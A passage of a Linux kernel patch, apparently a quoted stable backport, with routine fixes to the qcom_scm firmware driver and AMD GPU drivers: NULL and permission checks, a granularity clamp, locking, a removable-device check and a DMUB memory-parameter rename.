+ 	cbndtr = stm32_mdma_read(dmadev, STM32_MDMA_CBNDTR(chan->id));
+diff --git a/drivers/firmware/qcom_scm.c b/drivers/firmware/qcom_scm.c
+index 51eb85354c058..58f1a86065dc9 100644
+--- a/drivers/firmware/qcom_scm.c
++++ b/drivers/firmware/qcom_scm.c
+@@ -164,6 +164,12 @@ static enum qcom_scm_convention __get_convention(void)
+ 	if (likely(qcom_scm_convention != SMC_CONVENTION_UNKNOWN))
+ 		return qcom_scm_convention;
+ 
++	/*
++	 * Per the "SMC calling convention specification", the 64-bit calling
++	 * convention can only be used when the client is 64-bit, otherwise
++	 * system will encounter the undefined behaviour.
++	 */
++#if IS_ENABLED(CONFIG_ARM64)
+ 	/*
+ 	 * Device isn't required as there is only one argument - no device
+ 	 * needed to dma_map_single to secure world
+@@ -184,6 +190,7 @@ static enum qcom_scm_convention __get_convention(void)
+ 		forced = true;
+ 		goto found;
+ 	}
++#endif
+ 
+ 	probed_convention = SMC_CONVENTION_ARM_32;
+ 	ret = __scm_smc_call(NULL, &desc, probed_convention, &res, true);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
+index 30c28a69e847d..e4ad2bd8d8110 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
+@@ -29,6 +29,7 @@
+ #include "amdgpu.h"
+ #include "atom.h"
+ 
++#include <linux/device.h>
+ #include <linux/pci.h>
+ #include <linux/slab.h>
+ #include <linux/acpi.h>
+@@ -289,6 +290,10 @@ static bool amdgpu_atrm_get_bios(struct amdgpu_device *adev)
+ 	if (adev->flags & AMD_IS_APU)
+ 		return false;
+ 
++	/* ATRM is for on-platform devices only */
++	if (dev_is_removable(&adev->pdev->dev))
++		return false;
++
+ 	while ((pdev = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, pdev)) != NULL) {
+ 		dhandle = ACPI_HANDLE(&pdev->dev);
+ 		if (!dhandle)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_bo_list.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_bo_list.c
+index 252a876b07258..fdc302aa59e7b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_bo_list.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_bo_list.c
+@@ -179,6 +179,7 @@ int amdgpu_bo_list_get(struct amdgpu_fpriv *fpriv, int id,
+ 	}
+ 
+ 	rcu_read_unlock();
++	*result = NULL;
+ 	return -ENOENT;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index 4624160315648..ced4e7e8f98b5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -1391,7 +1391,7 @@ int amdgpu_cs_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 		if (r == -ENOMEM)
+ 			DRM_ERROR("Not enough memory for command submission!\n");
+ 		else if (r != -ERESTARTSYS && r != -EAGAIN)
+-			DRM_ERROR("Failed to process the buffer list %d!\n", r);
++			DRM_DEBUG("Failed to process the buffer list %d!\n", r);
+ 		goto error_fini;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+index de61a85c4b022..fd796574f87a5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+@@ -589,6 +589,9 @@ static ssize_t amdgpu_debugfs_regs_smc_read(struct file *f, char __user *buf,
+ 	ssize_t result = 0;
+ 	int r;
+ 
++	if (!adev->smc_rreg)
++		return -EPERM;
++
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+ 
+@@ -645,6 +648,9 @@ static ssize_t amdgpu_debugfs_regs_smc_write(struct file *f, const char __user *
+ 	ssize_t result = 0;
+ 	int r;
+ 
++	if (!adev->smc_wreg)
++		return -EPERM;
++
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 92fa2faf63e41..8a1b84aaaf717 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -41,6 +41,7 @@
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_probe_helper.h>
+ #include <drm/amdgpu_drm.h>
++#include <linux/device.h>
+ #include <linux/vgaarb.h>
+ #include <linux/vga_switcheroo.h>
+ #include <linux/efi.h>
+@@ -2105,7 +2106,6 @@ out:
+  */
+ static int amdgpu_device_ip_early_init(struct amdgpu_device *adev)
+ {
+-	struct drm_device *dev = adev_to_drm(adev);
+ 	struct pci_dev *parent;
+ 	int i, r;
+ 
+@@ -2175,7 +2175,7 @@ static int amdgpu_device_ip_early_init(struct amdgpu_device *adev)
+ 	    (amdgpu_is_atpx_hybrid() ||
+ 	     amdgpu_has_atpx_dgpu_power_cntl()) &&
+ 	    ((adev->flags & AMD_IS_APU) == 0) &&
+-	    !pci_is_thunderbolt_attached(to_pci_dev(dev->dev)))
++	    !dev_is_removable(&adev->pdev->dev))
+ 		adev->flags |= AMD_IS_PX;
+ 
+ 	if (!(adev->flags & AMD_IS_APU)) {
+@@ -3968,7 +3968,7 @@ fence_driver_init:
+ 
+ 	px = amdgpu_device_supports_px(ddev);
+ 
+-	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++	if (px || (!dev_is_removable(&adev->pdev->dev) &&
+ 				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_register_client(adev->pdev,
+ 					       &amdgpu_switcheroo_ops, px);
+@@ -4117,7 +4117,7 @@ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ 
+ 	px = amdgpu_device_supports_px(adev_to_drm(adev));
+ 
+-	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++	if (px || (!dev_is_removable(&adev->pdev->dev) &&
+ 				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_unregister_client(adev->pdev);
+ 
+@@ -5330,7 +5330,8 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ 	 * Flush RAM to disk so that after reboot
+ 	 * the user can read log and see why the system rebooted.
+ 	 */
+-	if (need_emergency_restart && amdgpu_ras_get_context(adev)->reboot) {
++	if (need_emergency_restart && amdgpu_ras_get_context(adev) &&
++		amdgpu_ras_get_context(adev)->reboot) {
+ 		DRM_WARN("Emergency reboot.");
+ 
+ 		ksys_sync_helper();
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+index 09fc464f5f128..9fe2eae88ec17 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+@@ -1273,7 +1273,8 @@ static void amdgpu_ras_sysfs_remove_bad_page_node(struct amdgpu_device *adev)
+ {
+ 	struct amdgpu_ras *con = amdgpu_ras_get_context(adev);
+ 
+-	sysfs_remove_file_from_group(&adev->dev->kobj,
++	if (adev->dev->kobj.sd)
++		sysfs_remove_file_from_group(&adev->dev->kobj,
+ 				&con->badpages_attr.attr,
+ 				RAS_FS_NAME);
+ }
+@@ -1290,7 +1291,8 @@ static int amdgpu_ras_sysfs_remove_feature_node(struct amdgpu_device *adev)
+ 		.attrs = attrs,
+ 	};
+ 
+-	sysfs_remove_group(&adev->dev->kobj, &group);
++	if (adev->dev->kobj.sd)
++		sysfs_remove_group(&adev->dev->kobj, &group);
+ 
+ 	return 0;
+ }
+@@ -1337,7 +1339,8 @@ int amdgpu_ras_sysfs_remove(struct amdgpu_device *adev,
+ 	if (!obj || !obj->attr_inuse)
+ 		return -EINVAL;
+ 
+-	sysfs_remove_file_from_group(&adev->dev->kobj,
++	if (adev->dev->kobj.sd)
++		sysfs_remove_file_from_group(&adev->dev->kobj,
+ 				&obj->sysfs_attr.attr,
+ 				RAS_FS_NAME);
+ 	obj->attr_inuse = 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+index 5c1193dd7d88c..48e612023d0c7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+@@ -391,8 +391,15 @@ int amdgpu_vcn_suspend(struct amdgpu_device *adev)
+ 	void *ptr;
+ 	int i, idx;
+ 
++	bool in_ras_intr = amdgpu_ras_intr_triggered();
++
+ 	cancel_delayed_work_sync(&adev->vcn.idle_work);
+ 
++	/* err_event_athub will corrupt VCPU buffer, so we need to
++	 * restore fw data and clear buffer in amdgpu_vcn_resume() */
++	if (in_ras_intr)
++		return 0;
++
+ 	for (i = 0; i < adev->vcn.num_vcn_inst; ++i) {
+ 		if (adev->vcn.harvest_config & (1 << i))
+ 			continue;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+index d60c4a2eeb0c5..06980b8527ff8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+@@ -239,6 +239,8 @@ static int amdgpu_vkms_conn_get_modes(struct drm_connector *connector)
+ 
+ 	for (i = 0; i < ARRAY_SIZE(common_modes); i++) {
+ 		mode = drm_cvt_mode(dev, common_modes[i].w, common_modes[i].h, 60, false, false, false);
++		if (!mode)
++			continue;
+ 		drm_mode_probed_add(connector, mode);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c b/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
+index 7ba47fc1917b2..73937ce8829cc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
+@@ -28,6 +28,7 @@
+ #include "nbio/nbio_2_3_offset.h"
+ #include "nbio/nbio_2_3_sh_mask.h"
+ #include <uapi/linux/kfd_ioctl.h>
++#include <linux/device.h>
+ #include <linux/pci.h>
+ 
+ #define smnPCIE_CONFIG_CNTL	0x11180044
+@@ -361,7 +362,7 @@ static void nbio_v2_3_enable_aspm(struct amdgpu_device *adev,
+ 
+ 		data |= NAVI10_PCIE__LC_L0S_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L0S_INACTIVITY__SHIFT;
+ 
+-		if (pci_is_thunderbolt_attached(adev->pdev))
++		if (dev_is_removable(&adev->pdev->dev))
+ 			data |= NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT  << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+ 		else
+ 			data |= NAVI10_PCIE__LC_L1_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+@@ -480,7 +481,7 @@ static void nbio_v2_3_program_aspm(struct amdgpu_device *adev)
+ 
+ 	def = data = RREG32_PCIE(smnPCIE_LC_CNTL);
+ 	data |= NAVI10_PCIE__LC_L0S_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L0S_INACTIVITY__SHIFT;
+-	if (pci_is_thunderbolt_attached(adev->pdev))
++	if (dev_is_removable(&adev->pdev->dev))
+ 		data |= NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT  << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+ 	else
+ 		data |= NAVI10_PCIE__LC_L1_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+index d7e758c86a0b8..208812512d8a8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+@@ -612,8 +612,15 @@ create_bo_failed:
+ 
+ void svm_range_vram_node_free(struct svm_range *prange)
+ {
+-	svm_range_bo_unref(prange->svm_bo);
+-	prange->ttm_res = NULL;
++	/* serialize prange->svm_bo unref */
++	mutex_lock(&prange->lock);
++	/* prange->svm_bo has not been unref */
++	if (prange->ttm_res) {
++		prange->ttm_res = NULL;
++		mutex_unlock(&prange->lock);
++		svm_range_bo_unref(prange->svm_bo);
++	} else
++		mutex_unlock(&prange->lock);
+ }
+ 
+ struct amdgpu_device *
+@@ -757,7 +764,7 @@ svm_range_apply_attrs(struct kfd_process *p, struct svm_range *prange,
+ 			prange->flags &= ~attrs[i].value;
+ 			break;
+ 		case KFD_IOCTL_SVM_ATTR_GRANULARITY:
+-			prange->granularity = attrs[i].value;
++			prange->granularity = min_t(uint32_t, attrs[i].value, 0x3F);
+ 			break;
+ 		default:
+ 			WARN_ONCE(1, "svm_range_check_attrs wasn't called?");
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 42e266e074d1d..001932cb813dc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2057,7 +2057,7 @@ static int dm_dmub_sw_init(struct amdgpu_device *adev)
+ 	struct dmub_srv_create_params create_params;
+ 	struct dmub_srv_region_params region_params;
+ 	struct dmub_srv_region_info region_info;
+-	struct dmub_srv_fb_params fb_params;
++	struct dmub_srv_memory_params memory_params;
+ 	struct dmub_srv_fb_info *fb_info;
+ 	struct dmub_srv *dmub_srv;
+ 	const struct dmcub_firmware_header_v1_0 *hdr;
+@@ -2188,6 +2188,7 @@ static int dm_dmub_sw_init(struct amdgpu_device *adev)
+ 		adev->dm.dmub_fw->data +
+ 		le32_to_cpu(hdr->header.ucode_array_offset_bytes) +
+ 		PSP_HEADER_BYTES;
++	region_params.is_mailbox_in_inbox = false;
+ 
+ 	status = dmub_srv_calc_region_info(dmub_srv, &region_params,
+ 					   &region_info);
+@@ -2209,10 +2210,10 @@ static int dm_dmub_sw_init(struct amdgpu_device *adev)
+ 		return r;
+ 
+ 	/* Rebase the regions on the framebuffer address. */
+-	memset(&fb_params, 0, sizeof(fb_params));
+-	fb_params.cpu_addr = adev->dm.dmub_bo_cpu_addr;
+-	fb_params.gpu_addr = adev->dm.dmub_bo_gpu_addr;
+-	fb_params.region_info = &region_info;
++	memset(&memory_params, 0, sizeof(memory_params));
++	memory_params.cpu_fb_addr = adev->dm.dmub_bo_cpu_addr;
++	memory_params.gpu_fb_addr = adev->dm.dmub_bo_gpu_addr;
++	memory_params.region_info = &region_info;
+ 
+ 	adev->dm.dmub_fb_info =
+ 		kzalloc(sizeof(*adev->dm.dmub_fb_info), GFP_KERNEL);
+@@ -2224,7 +2225,7 @@ static int dm_dmub_sw_init(struct amdgpu_device *adev)
+ 		return -ENOMEM;
+ 	}
+ 
+-	status = dmub_srv_calc_fb_info(dmub_srv, &fb_params, fb_info);
++	status = dmub_srv_calc_mem_info(dmub_srv, &memory_params, fb_info);
+ 	if (status != DMUB_STATUS_OK) {
+ 		DRM_ERROR("Error calculating DMUB FB info: %d\n", status);
+ 		return -EINVAL;
+@@ -7219,6 +7220,9 @@ static int amdgpu_dm_i2c_xfer(struct i2c_adapter *i2c_adap,
+ 	int i;
+ 	int result = -EIO;
+ 
++	if (!ddc_service->ddc_pin || !ddc_service->ddc_pin->hw_info.hw_supported)
++		return result;
++
+ 	cmd.payloads = kcalloc(num, sizeof(struct i2c_payload), GFP_KERNEL);
+ 
+ 	if (!cmd.payloads)
+@@ -9282,14 +9286,14 @@ static bool should_reset_plane(struct drm_atomic_state *state,
+ 	struct drm_plane *other;
+ 	struct drm_plane_state *old_other_state, *new_other_state;
+ 	struct drm_crtc_state *new_crtc_state;
++	struct amdgpu_device *adev = drm_to_adev(plane->dev);
+ 	int i;
+ 
+ 	/*
+-	 * TODO: Remove this hack once the checks below are sufficient
+-	 * enough to determine when we need to reset all the planes on
+-	 * the stream.
++	 * TODO: Remove this hack for all asics once it proves that the
++	 * fast updates works fine on DCN3.2+.
+ 	 */
+-	if (state->allow_modeset)
++	if (adev->ip_versions[DCE_HWIP][0] < IP_VERSION(3, 2, 0) && state->allow_modeset)
+ 		return true;
+ 
+ 	/* Exit early if we know that we're adding or removing the plane. */
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 15d3caf3d6d72..7a309547c2b3f 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -996,7 +996,8 @@ static bool dc_construct(struct dc *dc,
+ 	/* set i2c speed if not done by the respective dcnxxx__resource.c */
+ 	if (dc->caps.i2c_speed_in_khz_hdcp == 0)
+ 		dc->caps.i2c_speed_in_khz_hdcp = dc->caps.i2c_speed_in_khz;
+-
++	if (dc->caps.max_optimizable_video_width == 0)
++		dc->caps.max_optimizable_video_width = 5120;
+ 	dc->clk_mgr = dc_clk_mgr_create(dc->ctx, dc->res_pool->pp_smu, dc->res_pool->dccg);
+ 	if (!dc->clk_mgr)
+ 		goto fail;
+@@ -1805,7 +1806,7 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 	if (dc->hwss.subvp_pipe_control_lock)
+ 		dc->hwss.subvp_pipe_control_lock(dc, context, true, true, NULL, subvp_prev_use);
+ 
+-	if (dc->debug.enable_double_buffered_dsc_pg_support)
++	if (dc->hwss.update_dsc_pg)
+ 		dc->hwss.update_dsc_pg(dc, context, false);
+ 
+ 	disable_dangling_plane(dc, context);
+@@ -1904,7 +1905,7 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 		dc->hwss.optimize_bandwidth(dc, context);
+ 	}
+ 
+-	if (dc->debug.enable_double_buffered_dsc_pg_support)
++	if (dc->hwss.update_dsc_pg)
+ 		dc->hwss.update_dsc_pg(dc, context, true);
+ 
+ 	if (dc->ctx->dce_version >= DCE_VERSION_MAX)
+@@ -2192,7 +2193,7 @@ void dc_post_update_surfaces_to_stream(struct dc *dc)
+ 
+ 		dc->hwss.optimize_bandwidth(dc, context);
+ 
+-		if (dc->debug.enable_double_buffered_dsc_pg_support)
++		if (dc->hwss.update_dsc_pg)
+ 			dc->hwss.update_dsc_pg(dc, context, true);
+ 	}
+ 
+@@ -2438,6 +2439,7 @@ static enum surface_update_type get_plane_info_update_type(const struct dc_surfa
+ }
+ 
+ static enum surface_update_type get_scaling_info_update_type(
++		const struct dc *dc,
+ 		const struct dc_surface_update *u)
+ {
+ 	union surface_update_flags *update_flags = &u->surface->update_flags;
+@@ -2472,6 +2474,12 @@ static enum surface_update_type get_scaling_info_update_type(
+ 			update_flags->bits.clock_change = 1;
+ 	}
+ 
++	if (u->scaling_info->src_rect.width > dc->caps.max_optimizable_video_width &&
++		(u->scaling_info->clip_rect.width > u->surface->clip_rect.width ||
++		 u->scaling_info->clip_rect.height > u->surface->clip_rect.height))
++		 /* Changing clip size of a large surface may result in MPC slice count change */
++		update_flags->bits.bandwidth_change = 1;
++
+ 	if (u->scaling_info->src_rect.x != u->surface->src_rect.x
+ 			|| u->scaling_info->src_rect.y != u->surface->src_rect.y
+ 			|| u->scaling_info->clip_rect.x != u->surface->clip_rect.x
+@@ -2509,7 +2517,7 @@ static enum surface_update_type det_surface_update(const struct dc *dc,
+ 	type = get_plane_info_update_type(u);
+ 	elevate_update_type(&overall_type, type);
+ 
+-	type = get_scaling_info_update_type(u);
++	type = get_scaling_info_update_type(dc, u);
+ 	elevate_update_type(&overall_type, type);
+ 
+ 	if (u->flip_addr) {
+@@ -3445,7 +3453,7 @@ static void commit_planes_for_stream(struct dc *dc,
+ 		if (get_seamless_boot_stream_count(context) == 0)
+ 			dc->hwss.prepare_bandwidth(dc, context);
+ 
+-		if (dc->debug.enable_double_buffered_dsc_pg_support)
++		if (dc->hwss.update_dsc_pg)
+ 			dc->hwss.update_dsc_pg(dc, context, false);
+ 
+ 		context_clock_trace(dc, context);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_stream.c b/drivers/gpu/drm/amd/display/dc/core/dc_stream.c
+index 38d71b5c1f2d5..556c57c390ffd 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_stream.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_stream.c
+@@ -567,7 +567,7 @@ uint32_t dc_stream_get_vblank_counter(const struct dc_stream_state *stream)
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		struct timing_generator *tg = res_ctx->pipe_ctx[i].stream_res.tg;
+ 
+-		if (res_ctx->pipe_ctx[i].stream != stream)
++		if (res_ctx->pipe_ctx[i].stream != stream || !tg)
+ 			continue;
+ 
+ 		return tg->funcs->get_frame_count(tg);
+@@ -626,7 +626,7 @@ bool dc_stream_get_scanoutpos(const struct dc_stream_state *stream,
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		struct timing_generator *tg = res_ctx->pipe_ctx[i].stream_res.tg;
+ 
+-		if (res_ctx->pipe_ctx[i].stream != stream)
++		if (res_ctx->pipe_ctx[i].stream != stream || !tg)
+ 			continue;
+ 
+ 		tg->funcs->get_scanoutpos(tg,
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index a4540f83aae59..f773a467fef54 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -230,6 +230,11 @@ struct dc_caps {
+ 	uint32_t dmdata_alloc_size;
+ 	unsigned int max_cursor_size;
+ 	unsigned int max_video_width;
++	/*
++	 * max video plane width that can be safely assumed to be always
++	 * supported by single DPP pipe.
++	 */
++	unsigned int max_optimizable_video_width;
+ 	unsigned int min_horizontal_blanking_period;
+ 	int linear_pitch_alignment;
+ 	bool dcc_const_color;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index d477dcc9149fa..50b3547977281 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -79,6 +79,9 @@ void dcn32_dsc_pg_control(
+ 	if (hws->ctx->dc->debug.disable_dsc_power_gate)
+ 		return;
+ 
++	if (!hws->ctx->dc->debug.enable_double_buffered_dsc_pg_support)
++		return;
++
+ 	REG_GET(DC_IP_REQUEST_CNTL, IP_REQUEST_EN, &org_ip_request_cntl);
+ 	if (org_ip_request_cntl == 0)
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0, IP_REQUEST_EN, 1);
+diff --git a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+index 5f17b252e9be4..a21fe7b037d1f 100644
+--- a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+@@ -174,6 +174,7 @@ struct dmub_srv_region_params {
+ 	uint32_t vbios_size;
+ 	const uint8_t *fw_inst_const;
+ 	const uint8_t *fw_bss_data;
++	bool is_mailbox_in_inbox;
+ };
+ 
+ /**
+@@ -193,20 +194,25 @@ struct dmub_srv_region_params {
+  */
+ struct dmub_srv_region_info {
+ 	uint32_t fb_size;
++	uint32_t inbox_size;
+ 	uint8_t num_regions;
+ 	struct dmub_region regions[DMUB_WINDOW_TOTAL];
+ };
+ 
+ /**
+- * struct dmub_srv_fb_params - parameters used for driver fb setup
++ * struct dmub_srv_memory_params - parameters used for driver fb setup
+  * @region_info: region info calculated by dmub service
+- * @cpu_addr: base cpu address for the framebuffer
+- * @gpu_addr: base gpu virtual address for the framebuffer
++ * @cpu_fb_addr: base cpu address for the framebuffer
++ * @cpu_inbox_addr: base cpu address for the gart
++ * @gpu_fb_addr: base gpu virtual address for the framebuffer
++ * @gpu_inbox_addr: base gpu virtual address for the gart
+  */
+-struct dmub_srv_fb_params {
++struct dmub_srv_memory_params {
+ 	const struct dmub_srv_region_info *region_info;
+-	void *cpu_addr;
+-	uint64_t gpu_addr;
++	void *cpu_fb_addr;
++	void *cpu_inbox_addr;
++	uint64_t gpu_fb_addr;
++	uint64_t gpu_inbox_addr;
+ };
+ 
+ /**
+@@ -524,8 +530,8 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+  *   DMUB_STATUS_OK - success
+  *   DMUB_STATUS_INVALID - unspecified error
+  */
+-enum dmub_status dmub_srv_calc_fb_info(struct dmub_srv *dmub,
+-				       const struct dmub_srv_fb_params *params,
++enum dmub_status dmub_srv_calc_mem_info(struct dmub_srv *dmub,
++				       const struct dmub_srv_memory_params *params,
+ 				       struct dmub_srv_fb_info *out);
+ 
+ /**
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+index 0dab22d794808..c3327875933e9 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+@@ -384,7 +384,7 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+ 	uint32_t fw_state_size = DMUB_FW_STATE_SIZE;
+ 	uint32_t trace_buffer_size = DMUB_TRACE_BUFFER_SIZE;
+ 	uint32_t scratch_mem_size = DMUB_SCRATCH_MEM_SIZE;
+-
++	uint32_t previous_top = 0;
+ 	if (!dmub->sw_init)
+ 		return DMUB_STATUS_INVALID;
+ 
+@@ -409,8 +409,15 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+ 	bios->base = dmub_align(stack->top, 256);
+ 	bios->top = bios->base + params->vbios_size;
+ 
+-	mail->base = dmub_align(bios->top, 256);
+-	mail->top = mail->base + DMUB_MAILBOX_SIZE;
++	if (params->is_mailbox_in_inbox) {
++		mail->base = 0;
++		mail->top = mail->base + DMUB_MAILBOX_SIZE;
++		previous_top = bios->top;
++	} else {
++		mail->base = dmub_align(bios->top, 256);
++		mail->top = mail->base + DMUB_MAILBOX_SIZE;
++		previous_top = mail->top;
++	}
+ 
+ 	fw_info = dmub_get_fw_meta_info(params);
+ 
+@@ -429,7 +436,7 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+ 			dmub->fw_version = fw_info->fw_version;
+ 	}
+ 
+-	trace_buff->base = dmub_align(mail->top, 256);
++	trace_buff->base = dmub_align(previous_top, 256);
+ 	trace_buff->top = trace_buff->base + dmub_align(trace_buffer_size, 64);
+ 
+ 	fw_state->base = dmub_align(trace_buff->top, 256);
+@@ -440,11 +447,14 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+ 
+ 	out->fb_size = dmub_align(scratch_mem->top, 4096);
+ 
++	if (params->is_mailbox_in_inbox)
++		out->inbox_size = dmub_align(mail->top, 4096);
++
+ 	return DMUB_STATUS_OK;
+ }
+ 
+-enum dmub_status dmub_srv_calc_fb_info(struct dmub_srv *dmub,
+-				       const struct dmub_srv_fb_params *params,
++enum dmub_status dmub_srv_calc_mem_info(struct dmub_srv *dmub,
++				       const struct dmub_srv_memory_params *params,
+ 				       struct dmub_srv_fb_info *out)
+ {
+ 	uint8_t *cpu_base;
+@@ -459,8 +469,8 @@ enum dmub_status dmub_srv_calc_fb_info(struct dmub_srv *dmub,
+ 	if (params->region_info->num_regions != DMUB_NUM_WINDOWS)
+ 		return DMUB_STATUS_INVALID;
+ 
+-	cpu_base = (uint8_t *)params->cpu_addr;
+-	gpu_base = params->gpu_addr;
++	cpu_base = (uint8_t *)params->cpu_fb_addr;
++	gpu_base = params->gpu_fb_addr;
+ 
+ 	for (i = 0; i < DMUB_NUM_WINDOWS; ++i) {
+ 		const struct dmub_region *reg =
+@@ -468,6 +478,12 @@ enum dmub_status dmub_srv_calc_fb_info(struct dmub_srv *dmub,
+ 
+ 		out->fb[i].cpu_addr = cpu_base + reg->base;
+ 		out->fb[i].gpu_addr = gpu_base + reg->base;
++
++		if (i == DMUB_WINDOW_4_MAILBOX && params->cpu_inbox_addr != 0) {
++			out->fb[i].cpu_addr = (uint8_t *)params->cpu_inbox_addr + reg->base;
++			out->fb[i].gpu_addr = params->gpu_inbox_addr + reg->base;
++		}
++
+ 		out->fb[i].size = reg->top - reg->base;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/include/pptable.h b/drivers/gpu/drm/amd/include/pptable.h
+index 0b6a057e0a4c4..5aac8d545bdc6 100644
+--- a/drivers/gpu/drm/amd/include/pptable.h
++++ b/drivers/gpu/drm/amd/include/pptable.h
+@@ -78,7 +78,7 @@ typedef struct _ATOM_PPLIB_THERMALCONTROLLER
+ typedef struct _ATOM_PPLIB_STATE
+ {
+     UCHAR ucNonClockStateIndex;
+-    UCHAR ucClockStateIndices[1]; // variable-sized
++    UCHAR ucClockStateIndices[]; // variable-sized
+ } ATOM_PPLIB_STATE;
+ 
+ 
+@@ -473,7 +473,7 @@ typedef struct _ATOM_PPLIB_STATE_V2
+       /**
